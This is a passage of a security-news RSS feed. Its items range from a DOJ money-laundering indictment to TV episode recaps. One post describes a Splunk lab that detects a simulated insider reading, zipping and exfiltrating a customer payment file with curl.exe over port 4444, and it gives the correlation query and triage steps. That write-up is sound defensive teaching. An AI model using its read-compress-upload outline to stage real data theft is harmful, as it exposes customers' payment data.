2020 and 2022 and involved an extensive network of shell companies and bank accounts.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">According to <a href="https://www.justice.gov/opa/pr/two-key-members-chinese-money-laundering-network-charged-laundering-43-million-investment" target="_blank" rel="nofollow noopener">prosecutors</a>, Zhuoying Chen, 27, of Brooklyn, and Haojie Zhang, 38, of Queens, managed more than a dozen individuals across Brooklyn and Queens. The group allegedly opened 140 bank accounts under approximately 45 shell companies to move proceeds from fraudulent investment scams before transferring the funds to co-conspirators based in China.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Authorities said the <a href="https://thecyberexpress.com/global-crypto-investment-scam/" target="_blank" rel="noopener">investment fraud</a> schemes began with perpetrators contacting victims through messaging platforms and social media. They allegedly built trust over time, persuaded victims to invest in seemingly lucrative opportunities, displayed fake profits to encourage additional investments, and ultimately stole the victims' money.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Officials Vow Crackdown on Chinese Money Laundering Operations</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Commenting on the Chinese money laundering case, Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="29016">General</a> A. Tysen Duva said, "As alleged in the indictment, the defendants laundered <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="29015">fraud</a> proceeds, enabling scammers to continue to victimize Americans and deprive them of their hard-earned money." He added that dismantling Chinese money laundering networks supporting investment fraud is critical to protecting Americans and that the Criminal Division "will relentlessly pursue the financial networks that fuel and profit from these fraud schemes."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">U.S. Attorney Joseph Nocella Jr. for the Eastern District of New York described the defendants as "key members of a sophisticated money laundering network" that allegedly routed more than $40 million in victim funds to bank accounts in China. He said the office would continue pursuing individuals involved in investment fraud targeting vulnerable victims.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">FBI New York Assistant Director in Charge James C. Barnacle Jr. stated that the operation allegedly laundered more than $40 million from American victims before depositing the funds into Chinese accounts overseas. He said the <a href="https://thecyberexpress.com/operation-tri-force-sentinel/" target="_blank" rel="noopener">FBI</a> remains committed to working with federal partners to dismantle such fraud networks.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Acting Executive Associate Director John A. Condon of Homeland <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29014">Security</a> Investigations said the two Chinese nationals allegedly operated the illicit network for nearly two years, laundering victims' life savings. IRS Criminal Investigation Special Agent in Charge Harry T. Chavis Jr. said the indictment demonstrates that "justice is coming" for fraudsters, while U.S. Postal Inspection Service Inspector in Charge Ketty Larco-Ward noted that investment fraud schemes <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29013">exploit</a> victims' trust through false promises of returns.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Investigation and Legal Proceedings Continue</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The conspiracy to commit money laundering charge carries a maximum sentence of 20 years in prison. The investigation is being conducted by FBI New York, HSI New York, IRS Criminal Investigation New York, and the U.S. Postal Inspection Service. The prosecution is being led by Trial Attorneys Claire Galasso, David Ginensky, and Adrienne Rosen, along with Assistant U.S. Attorneys Benjamin Weintraub and David Berman.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The case also forms part of the Homeland Security Task Force initiative established under Executive Order 14159. Officials emphasized that an indictment is only an allegation, and Zhuoying Chen and the co-defendant are presumed innocent unless proven guilty beyond a reasonable doubt in court.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Group Behind ‘2000 Mules’ Is Back With Another Election Conspiracy Film]]></title>
<description><![CDATA[True the Vote is working with a Detroit pastor to produce a new documentary called Trap, based on claims that have already been thrown out in court.]]></description>
<link>https://tsecurity.de/de/3675646/it-nachrichten/the-group-behind-2000-mules-is-back-with-another-election-conspiracy-film/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675646/it-nachrichten/the-group-behind-2000-mules-is-back-with-another-election-conspiracy-film/</guid>
<pubDate>Fri, 17 Jul 2026 11:50:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[True the Vote is working with a Detroit pastor to produce a new documentary called Trap, based on claims that have already been thrown out in court.]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Detected an Insider Threat in Splunk When Every Single Action Looked Legitimate]]></title>
<description><![CDATA[No broken password. No exploit. No firewall alert. Just an employee using access they were supposed to have — to take data they weren’t. Here’s how I caught it with a three-stage correlation in Splunk.By Ronak Mishra · SC-200 | Security+ | ISC2 CC · Splunk Enterprise SIEM LabMost detection conten...]]></description>
<link>https://tsecurity.de/de/3675351/hacking/how-i-detected-an-insider-threat-in-splunk-when-every-single-action-looked-legitimate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675351/hacking/how-i-detected-an-insider-threat-in-splunk-when-every-single-action-looked-legitimate/</guid>
<pubDate>Fri, 17 Jul 2026 09:23:42 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>No broken password. No exploit. No firewall alert. Just an employee using access they were supposed to have — to take data they weren’t. Here’s how I caught it with a three-stage correlation in Splunk.</em></p><p><em>By Ronak Mishra · SC-200 | Security+ | ISC2 CC · Splunk Enterprise SIEM Lab</em></p><p>Most detection content is about outsiders — brute force, phishing, exploits. The attacker is external, the activity is obviously malicious, and the logs light up.</p><p>Insider threats are the opposite. The account is valid. The access is authorized. Every individual action, viewed on its own, looks like normal work. There’s no single event you can alert on. And that’s exactly what makes them the hardest thing a SOC has to catch.</p><p>I built a Splunk lab to detect one end to end. This is how it worked.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6GmRtez2BHftjN-yNHsBWw.png"><figcaption><em>The Meridian SOC dashboard — six live panels built in Splunk, pulling from the same data this insider threat scenario generated.</em></figcaption></figure><p><strong>The scenario</strong></p><p>A fictional e-commerce company, Meridian Commerce Inc. A Finance account on a Windows 11 workstation (FIN-WKS-04) with legitimate access to customer payment data. The insider does three things:</p><ol><li><strong>Reads</strong> the payment file C:\CustomerExports\payments_export.csv. This account is allowed to. <em>(Event ID 4663)</em></li><li><strong>Compresses</strong> it with PowerShell’s Compress-Archive. Zipping a file isn't malicious. <em>(Event ID 4104)</em></li><li><strong>Exfiltrates</strong> it to an external host with curl.exe over port 4444. One outbound connection among thousands. <em>(Event ID 5156)</em></li></ol><p>Read, zip, upload. Three ordinary actions. No perimeter control catches this because nothing is breached. No auth alert fires because the login is valid. The attack lives entirely inside legitimate behavior. The only way to see it is to stop looking at events individually and start looking at the pattern they form together.</p><p><strong>Problem 1 — the workstation logs almost nothing by default</strong></p><p>Before correlating anything, I found the telemetry wasn’t even there. A default Windows 11 workstation doesn’t log these events. Three audit subcategories must be explicitly enabled: File System (4663) plus a SACL on the folder, PowerShell Script Block Logging (4104), and Filtering Platform Connection (5156). Without them, the read, the compression, and the exfiltration are all invisible. If these aren’t on <em>before</em> the attack, there’s nothing to detect after — the evidence was never written.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1LoptNEb58AKqbhooSulhA.png"><figcaption><em>The file-read stage caught in Splunk via Event ID 4663 — the first of three subcategories that are disabled by default on a stock Windows 11 workstation.</em></figcaption></figure><p><strong>Problem 2 — the compression step tried to hide</strong></p><p>I expected to catch the compression via Event ID 4688 (Process Creation). It never fired. Compress-Archive is a native PowerShell cmdlet — it runs inside the existing PowerShell engine and doesn't spawn a child process, so there's no 4688. Any detection relying only on process-creation auditing is blind to PowerShell-native staging. That's why Script Block Logging (4104) matters — it captures the cmdlet with full parameter bindings, including exact source and destination paths.</p><p><strong>The detection — correlating three stages into one incident</strong></p><pre>index=windows (EventCode=4663 Object_Name="*CustomerExports*")<br>    OR (EventCode=4104 _raw="*CompressFilesHelper*")<br>    OR (EventCode=5156 Destination_Port=4444)<br>| transaction host maxspan=30m<br>| where eventcount &gt;= 3<br>| table _time, host, eventcount, duration</pre><p>The three OR conditions each match one stage. transaction host maxspan=30m groups events on the same host within a 30-minute window into one logical unit — the line that turns scattered events into a story. where eventcount &gt;= 3 only fires when all three stages hit the same host inside that window. One stage, nothing. Two, nothing. All three in sequence — that's a kill chain, not coincidence.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ChuETHBGAxo0WqS68UXnKA.png"><figcaption><em>27 raw events correlated into 1 incident, spanning 25 minutes on FIN-WKS-04. Three innocent-looking actions revealed as one exfiltration chain.</em></figcaption></figure><p>Result: <strong>27 raw events correlated into 1 incident, spanning 25 minutes on FIN-WKS-04.</strong> One alert with the full narrative instead of 27 disconnected log lines nobody would piece together manually.</p><p><strong>What happens after the alert fires</strong></p><p>Detecting the chain is only step one. Here’s how I’d actually triage this in a live SOC:</p><p><strong>Severity:</strong> High. Confirmed customer PII touched, compressed, and sent to an external host — this isn’t “suspicious,” it’s a completed exfiltration, not an attempt.</p><p><strong>First move:</strong> Isolate FIN-WKS-04 from the network immediately to stop any further outbound activity, and disable the account pending investigation — not delete it, since the account and its full history are now evidence.</p><p><strong>Scope the blast radius:</strong> Pull every file that account touched in the same session window, not just the one flagged file — the transaction proves this exfiltration; it doesn’t rule out others in the same session.</p><p><strong>Escalate, don’t conclude:</strong> This is exactly the kind of finding that gets handed to IR and HR jointly, not closed solo by a SOC analyst. My job at this stage is to hand over a clean timeline, not decide intent — that’s a human resources and legal call, not a technical one.</p><p><strong>Tune after, don’t tune during:</strong> The 30-minute window and the 3-event threshold both need validation against real traffic before this becomes a production rule — a busy analyst doing legitimate bulk export-and-archive work could trip the same pattern. That tuning is exactly what separates a lab detection from a production one.</p><p>That last part matters more than the query itself. A rule that fires is only useful if someone downstream knows what to do the moment it does.</p><p><em>This is Phase 5 of a full Splunk Enterprise SIEM lab I built from scratch — 6 OWASP Top 10 detections, a live SOC dashboard, incident reports, and two documented detection gaps. Full lab and all SPL: github.com/ronakmishra28/meridian-soc-detection-lab</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=aeac34ea7190" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-detected-an-insider-threat-in-splunk-when-every-single-action-looked-legitimate-aeac34ea7190">How I Detected an Insider Threat in Splunk When Every Single Action Looked Legitimate</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Salad Chains Are Seeing Foot Traffic Drop Over Cyclosporiasis Fears]]></title>
<description><![CDATA[Foot traffic to leafy green chains is falling, data shows. Still, a few brave souls who spoke to WIRED were determined to get their fix. “I honestly didn’t even think about” the risk of explosive diarrhea, one says.]]></description>
<link>https://tsecurity.de/de/3674663/it-nachrichten/salad-chains-are-seeing-foot-traffic-drop-over-cyclosporiasis-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674663/it-nachrichten/salad-chains-are-seeing-foot-traffic-drop-over-cyclosporiasis-fears/</guid>
<pubDate>Thu, 16 Jul 2026 23:17:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Foot traffic to leafy green chains is falling, data shows. Still, a few brave souls who spoke to WIRED were determined to get their fix. “I honestly didn’t even think about” the risk of explosive diarrhea, one says.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Ordered to Give A.I. Rivals More Access on Android Smartphones]]></title>
<description><![CDATA[The decision by European Union regulators is a response to fears that Google will use its vast Android user base to gain an edge in A.I.]]></description>
<link>https://tsecurity.de/de/3673839/it-nachrichten/google-ordered-to-give-ai-rivals-more-access-on-android-smartphones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673839/it-nachrichten/google-ordered-to-give-ai-rivals-more-access-on-android-smartphones/</guid>
<pubDate>Thu, 16 Jul 2026 16:47:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The decision by European Union regulators is a response to fears that Google will use its vast Android user base to gain an edge in A.I.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Ordered to Give A.I. Rivals More Access on Android Smartphones]]></title>
<description><![CDATA[The decision by European Union regulators is a response to fears that Google will use its vast Android user base to gain an edge in A.I.]]></description>
<link>https://tsecurity.de/de/3673389/it-nachrichten/google-ordered-to-give-ai-rivals-more-access-on-android-smartphones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673389/it-nachrichten/google-ordered-to-give-ai-rivals-more-access-on-android-smartphones/</guid>
<pubDate>Thu, 16 Jul 2026 14:18:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The decision by European Union regulators is a response to fears that Google will use its vast Android user base to gain an edge in A.I.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Social media bans are likely to make things worse’: psychologist Candice Odgers on kids, tech and mental health]]></title>
<description><![CDATA[She has studied adolescent mental health for 25 years and fears the debate obscures some of the biggest issues facing teenagers – from the impact of Covid to the health of their adult caregiversThe quickest way to make being online safer for children and teens would be to kick all adult men off t...]]></description>
<link>https://tsecurity.de/de/3672299/ai-nachrichten/social-media-bans-are-likely-to-make-things-worse-psychologist-candice-odgers-on-kids-tech-and-mental-health/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672299/ai-nachrichten/social-media-bans-are-likely-to-make-things-worse-psychologist-candice-odgers-on-kids-tech-and-mental-health/</guid>
<pubDate>Thu, 16 Jul 2026 06:02:55 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>She has studied adolescent mental health for 25 years and fears the debate obscures some of the biggest issues facing teenagers – from the impact of Covid to the health of their adult caregivers</p><p>The quickest way to make being online safer for children and teens would be to kick all adult men off the internet, the Canadian psychologist Candice Odgers believes. Men are the biggest perpetrators of sextortion and most likely to spread misinformation, she says.</p><p>Odgers is not recommending this as a policy for governments to adopt: “That would be crazy, right? It would be unfair.” But she is on a drive to puncture the prevailing narrative that the best way to address online harms is a social media ban for teenagers.</p> <a href="https://www.theguardian.com/society/2026/jul/16/psychologist-candice-odgers-kids-tech-mental-health-social-media-bans">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sugar Season 2 Episode 5 Preview: Can Sugar Find Ji Before It Is Too Late?]]></title>
<description><![CDATA[Sugar Season 2 Episode 5 will continue John Sugar’s dangerous search for Ji Moon as Lieutenant Ray Vega closes in on both men. After the risky plan seen in Episode 4, Sugar must find a way to protect Ji while exposing the corruption surrounding his disappearance.




Release date: July 17, 2026

...]]></description>
<link>https://tsecurity.de/de/3670872/ios-mac-os/sugar-season-2-episode-5-preview-can-sugar-find-ji-before-it-is-too-late/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670872/ios-mac-os/sugar-season-2-episode-5-preview-can-sugar-find-ji-before-it-is-too-late/</guid>
<pubDate>Wed, 15 Jul 2026 15:55:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar Season 2 Episode 5 will continue John Sugar’s dangerous search for Ji Moon as Lieutenant Ray Vega closes in on both men. After the risky plan seen in Episode 4, Sugar must find a way to protect Ji while exposing the corruption surrounding his disappearance.




Release date: July 17, 2026



Episode title: “Unknowns”



Streaming platform: Apple TV



Genre: Neo-noir, mystery, thriller and science fiction



Season length: Eight episodes



Expected duration: Around 40 to 50 minutes



Main cast: Colin Farrell, Jin Ha, Raymond Lee, Tony Dalton, Laura Donnelly, Sasha Calle and Shea Whigham



Release schedule: New episodes arrive every Friday




Apple TV began releasing Sugar Season 2 on June 19, with the finale scheduled for August 7. Episode 5, therefore, marks the beginning of the second half of the season.



Sugar Season 2 Episode 5 Preview



Spoilers ahead for Sugar Season 2 Episode 4.



Sugar’s search for Ji took a dangerous turn after he confronted Vega and made it clear that he knew about the police officer’s involvement in the case. Vega has connections inside the department, which makes it difficult for Sugar to trust the authorities or ask them for help.



Episode 4 also revealed why Ji became a target. Ji had witnessed Vega killing a gang member, leaving Vega desperate to silence him before the truth became public. Sugar eventually used a fake overdose to fool Vega’s men before reviving Ji with Narcan. The plan saved Ji temporarily, but it also showed how far Sugar must go to keep him alive.



Episode 5 will likely follow Sugar as he tries to move Ji to a safer location. Vega now knows that Sugar has become a serious threat, so he could use his police resources to track them down. Sugar must stay ahead of him while convincing Ji to reveal everything he saw.



Can Sugar Keep Ji Safe From Vega?



Ji remains the most important witness in the investigation. His testimony could connect Vega to the murder and expose a larger network of corruption within the Los Angeles Police Department.



However, keeping Ji alive will become increasingly difficult. Vega has already shown that he can manipulate witnesses, use other officers and arrange traps without drawing attention to himself. His meeting with Hannah also proved that anyone connected to Ji can become a target.



Sugar may need help from Val or another unexpected ally to move Ji before Vega finds their location. Charlotte could also become more involved after investigating Sugar’s private life, although her true intentions remain uncertain.



Vega Could Turn the Investigation Against Sugar



Vega may try to portray Sugar as a criminal who kidnapped Ji or interfered with an official investigation. Since Sugar directly challenged him during their interrogation, Vega now has a personal reason to destroy his reputation.



Tony Dalton’s Vega has developed into Sugar’s main opponent, combining police authority with calculated violence. Their conflict should become even more intense in Episode 5 as Sugar searches for evidence that can support Ji’s account.



At the same time, Sugar continues searching for his missing sister, Djen. The Ji Moon case could eventually connect with that larger mystery, especially as the season explores a conspiracy stretching across Los Angeles and possibly beyond Earth.



Sugar Season 2 Episode 5 arrives on Apple TV on July 17. Do you think Sugar can keep Ji safe and expose Vega, or will the corrupt officer reach them first? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[How Silo Season 3 Is Setting Up the Fourth and Final Season]]></title>
<description><![CDATA[Silo Season 3 is already answering some of the show's biggest mysteries, but it is also laying the foundation for the final chapter. With Apple TV confirming that Season 4 will end the adaptation of Hugh Howey's trilogy, the latest episodes are expanding the story beyond Juliette's survival and r...]]></description>
<link>https://tsecurity.de/de/3670831/ios-mac-os/how-silo-season-3-is-setting-up-the-fourth-and-final-season/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670831/ios-mac-os/how-silo-season-3-is-setting-up-the-fourth-and-final-season/</guid>
<pubDate>Wed, 15 Jul 2026 15:40:29 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 is already answering some of the show's biggest mysteries, but it is also laying the foundation for the final chapter. With Apple TV confirming that Season 4 will end the adaptation of Hugh Howey's trilogy, the latest episodes are expanding the story beyond Juliette's survival and revealing how the silos came to exist in the first place.



Silo Season 3 at a glance




Release date: July 3, 2026



Episodes: 10



Release schedule: One new episode every Friday through September 4, 2026



Genre: Sci-fi, mystery, dystopian drama



Streaming on: Apple TV



Main cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Avi Nash, Ashley Zukerman, Jessica Henwick, Colin Hanks, Alexandria Riley



Created by: Graham Yost



Based on: Hugh Howey's bestselling Silo book trilogy




Where the story is heading



Spoilers ahead.



Season 3 continues Juliette Nichols' journey after the dramatic events of Season 2. While she faces the consequences of crossing between silos, the series also introduces a second timeline that takes viewers centuries into the past. This new storyline explores the events that led to humanity living underground and slowly uncovers the conspiracy behind the construction of the silos. 



Instead of focusing only on one underground community, the series now connects multiple silos and shows that the mystery is much bigger than anyone originally believed.



Season 3 is building the bridge to the ending



One of the biggest changes this season is its shift toward the prequel story inspired by Hugh Howey's Shift. While earlier seasons mainly followed Juliette's investigation inside Silo 18, Season 3 spends significant time exploring the "Before Times."



New characters such as journalist Helen Drew and Congressman Daniel Keene play a major role in uncovering the political decisions and hidden plans that shaped the future. Their discoveries explain why the silos exist and how the world reached its current state.



These revelations are expected to become the foundation for everything that happens in Season 4.



Multiple timelines are expanding the mystery



Season 3 uses two parallel storylines that slowly move toward each other.



The present-day story follows Juliette as she searches for answers while facing new dangers across different silos.



At the same time, the flashback timeline explains the origins of the underground civilization. Rather than treating these stories separately, each episode reveals information that changes how viewers understand events in the present.



This structure allows the writers to answer long-running questions while introducing new twists that can carry into the final season.



Season 4 already has a clear destination



Unlike many television series that wait for renewal decisions, Silo already knows where its story will end.



Apple renewed the show for both Seasons 3 and 4, allowing Graham Yost and the creative team to adapt the complete trilogy without rushing the ending. Season 4 will conclude the story by adapting the final novel, Dust, bringing together the mysteries surrounding the silos, their creators, and humanity's future.



Because of that long-term plan, many of Season 3's new characters, historical events, and world-building moments feel like carefully placed pieces rather than standalone stories.



Why fans should pay attention now



The latest season contains several clues that will likely become important later.



Viewers are learning:




How the silo project first began.



Who was responsible for creating it.



Why different silos developed differently.



How the past directly affects Juliette's future.



Which unanswered mysteries are being saved for the series finale.




Every episode adds another piece to the larger puzzle, making Season 3 one of the most important chapters in the entire series.



Wrap Up



Silo Season 3 does much more than continue Juliette's story. It expands the world, reveals the origins of the silos, and carefully prepares viewers for the confirmed fourth and final season. With two timelines finally coming together and more answers arriving each week, the series is moving steadily toward its planned conclusion.



What do you plan to watch on Apple TV this week? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximum Pleasure Guaranteed Episode 10 Recap: Who Survived the Gunshot?]]></title>
<description><![CDATA[Maximum Pleasure Guaranteed Episode 10 confirms that Detective Baxter survived the gunshot fired by Jennifer in the woods. However, his survival creates another serious problem for the Souter Group, which quickly begins removing anyone who can expose its operation.



Major spoilers for Episode 1...]]></description>
<link>https://tsecurity.de/de/3670809/ios-mac-os/maximum-pleasure-guaranteed-episode-10-recap-who-survived-the-gunshot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670809/ios-mac-os/maximum-pleasure-guaranteed-episode-10-recap-who-survived-the-gunshot/</guid>
<pubDate>Wed, 15 Jul 2026 15:24:36 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Maximum Pleasure Guaranteed Episode 10 confirms that Detective Baxter survived the gunshot fired by Jennifer in the woods. However, his survival creates another serious problem for the Souter Group, which quickly begins removing anyone who can expose its operation.



Major spoilers for Episode 10, “Queens,” follow.




Episode title: Queens



Release date: July 15, 2026



Streaming platform: Apple TV



Genre: Dark comedy, crime and thriller



Duration: Around 38 minutes



Season: Season 1, Episode 10



Main cast: Tatiana Maslany, Jake Johnson, Dolly de Leon, Murray Bartlett, Jon Michael Hill, Charlie Hall and Kiarra Hamagami Goldberg




Episode 10 serves as the Season 1 finale of the ten-part Apple TV series. It continues immediately after Jennifer shoots Baxter and escapes, while Paula enters the Souter Group’s private gathering to confront Cecilia.



Did Detective Baxter Survive the Gunshot?



Yes, Detective Baxter survives.



The finale later shows Baxter waking up in a hospital bed with Detective Gonzalez beside him. Gonzalez promises that they will discover what really happened, suggesting that the police investigation into Jennifer and the Souter Group remains active.



Baxter’s survival makes Jennifer dangerous to the people who hired her. She can now face charges for shooting a police officer, and Baxter can help identify her. The Souter Group also knows that Jennifer has enough information to expose the people behind the murders, surveillance and blackmail operation.



Jennifer believes completing the job against Paula will restore her position. However, Brian approaches her while she sits inside her car and shoots her several times. He then reports that the assignment has been completed. Jennifer does not survive the finale.



Paula Confronts Cecilia



Paula reaches Cecilia and explains that she has uncovered the connection between Trevor, Dennis and the Souter Group. The company publicly presents itself as a risk-advisory business, but Paula believes it secretly uses surveillance, threats and violence to influence events for powerful clients.



Paula cannot prove every part of the conspiracy, although she has evidence that Dennis bribed Joyce to help Cecilia’s son enter Yale. She threatens to expose that information unless Cecilia protects her and Hazel.



Cecilia appears to accept the deal because Paula soon receives exactly what she needs. The murder case against her disappears, and the company creates another suspect.



Dennis Survived His Shooting, but Does Not Survive the Finale



The episode reveals that Dennis survived after Paula shot him in the face. His injuries left him badly disfigured, while the Souter Group secretly kept him alive until it needed someone to blame.



Two workers take Dennis to a rooftop, place a false suicide note in his pocket and push him from the building. The note claims that he killed Trevor and Sky, which allows the police to close the case and clear Paula.



Therefore, Baxter and Dennis both survived their original gunshot wounds, although Dennis is later killed.



Does Paula Win Custody of Hazel?



Paula also survives the custody hearing against Karl and Mallory. Their lawyer raises her relationship with Trevor, her drinking and the mysterious Portland incident.



Paula admits that she struggled after her divorce, but she explains that loneliness and personal mistakes do not make her an unfit mother. The judge rules in her favour, allowing Hazel to remain in New York under the existing custody arrangement.



What Does the Final Scene Mean?



Paula’s victory does not last long.



An unknown person sends her security footage from Portland. The video appears to show Paula deliberately driving into Caleb, revealing that she played a direct role in his death. The sender tells Paula that they now control her and expect her to complete a favour.



Paula finally answers the phone as the season ends. The scene suggests that Cecilia spared Paula because the Souter Group sees value in her research skills and wants to force her into working for them. However, the identity of the caller remains unconfirmed.



Maximum Pleasure Guaranteed Episode 10 answers the gunshot cliffhanger while opening a much larger mystery around Paula’s past. What did you think about the finale, and do you plan to watch a possible second season? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 3 Preview: Juliette’s Memory Loss Could Become the Silo’s Biggest Threat]]></title>
<description><![CDATA[Silo Season 3 Episode 3 will continue Juliette Nichols’ fight to recover her missing memories as hidden forces tighten their control over Silo 18. The episode could show why her damaged memory now threatens everyone living underground.




Episode title: “A Dark Web”



Release date: Friday, July...]]></description>
<link>https://tsecurity.de/de/3670631/ios-mac-os/silo-season-3-episode-3-preview-juliettes-memory-loss-could-become-the-silos-biggest-threat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670631/ios-mac-os/silo-season-3-episode-3-preview-juliettes-memory-loss-could-become-the-silos-biggest-threat/</guid>
<pubDate>Wed, 15 Jul 2026 14:25:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 3 will continue Juliette Nichols’ fight to recover her missing memories as hidden forces tighten their control over Silo 18. The episode could show why her damaged memory now threatens everyone living underground.




Episode title: “A Dark Web”



Release date: Friday, July 17, 2026



Streaming platform: Apple TV



Genre: Science fiction, mystery and dystopian drama



Season length: 10 episodes



Main cast: Rebecca Ferguson, Common, Harriet Walter, Chinaza Uche, Avi Nash, Alexandria Riley, Jessica Henwick and Ashley Zukerman



New episodes: Every Friday through September 4, 2026




Spoilers ahead for Silo Season 3 Episode 2.



Juliette entered the season unable to remember important parts of her life, including the rebellion, her allies and the events surrounding her return to Silo 18. Episode 2 revealed that her condition is connected to memory-erasing drugs rather than an ordinary injury. Camille and Nurse Amy have been secretly controlling her treatment while following instructions connected to the Algorithm.



Juliette is beginning to question her new reality



Juliette’s memories remain incomplete, but fragments have started returning. These flashes directly challenge the version of events Camille has presented to her.



Episode 3 will likely follow Juliette as she investigates the people managing her recovery. The title “A Dark Web” suggests that she will discover a wider network operating inside the silo, possibly involving medical staff, surveillance systems and officials who want the population to forget the rebellion.



Patrick Kennedy has already helped Juliette understand that forgetfulness drugs exist. His information gives her a starting point, but accepting the truth also places her in greater danger. Anyone controlling the memory program will know that Juliette becomes harder to manage each time she remembers something.



Why Juliette’s memory loss threatens Silo 18



Juliette carries information that can expose the silo’s leadership, the purpose of the cleaning process and the truth about the world outside. Her missing memories temporarily protect the people responsible for hiding those secrets.



However, her confusion can also cause serious damage. Juliette may distrust genuine allies, follow manipulated information or make decisions without understanding their consequences. Since the silo is still recovering from rebellion, one wrong move can restart the conflict between residents and those in power.



Her search for Lukas Kyle could become especially important. Finding him may help her rebuild the missing parts of her story, including what happened before her forced cleaning and why the authorities consider her so dangerous.



The Before Times investigation will become more dangerous



Episode 3 will also continue the storyline set more than three centuries earlier. Journalist Helen Drew and Congressman Daniel Keene are investigating a conspiracy connected to the events that eventually forced humanity underground. Apple describes their discovery as a chain of events with catastrophic and irreversible consequences.



Helen’s investigation into memory experiments could explain why similar methods are being used against Juliette centuries later. The two timelines appear to be moving toward the same answer: memory control helped create the silo system and continues to protect it.



Silo Season 3 Episode 3 arrives on Apple TV on July 17. What do you think Juliette will remember next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximum Pleasure Guaranteed Episode 10 Recap: Who Survived the Gunshot?]]></title>
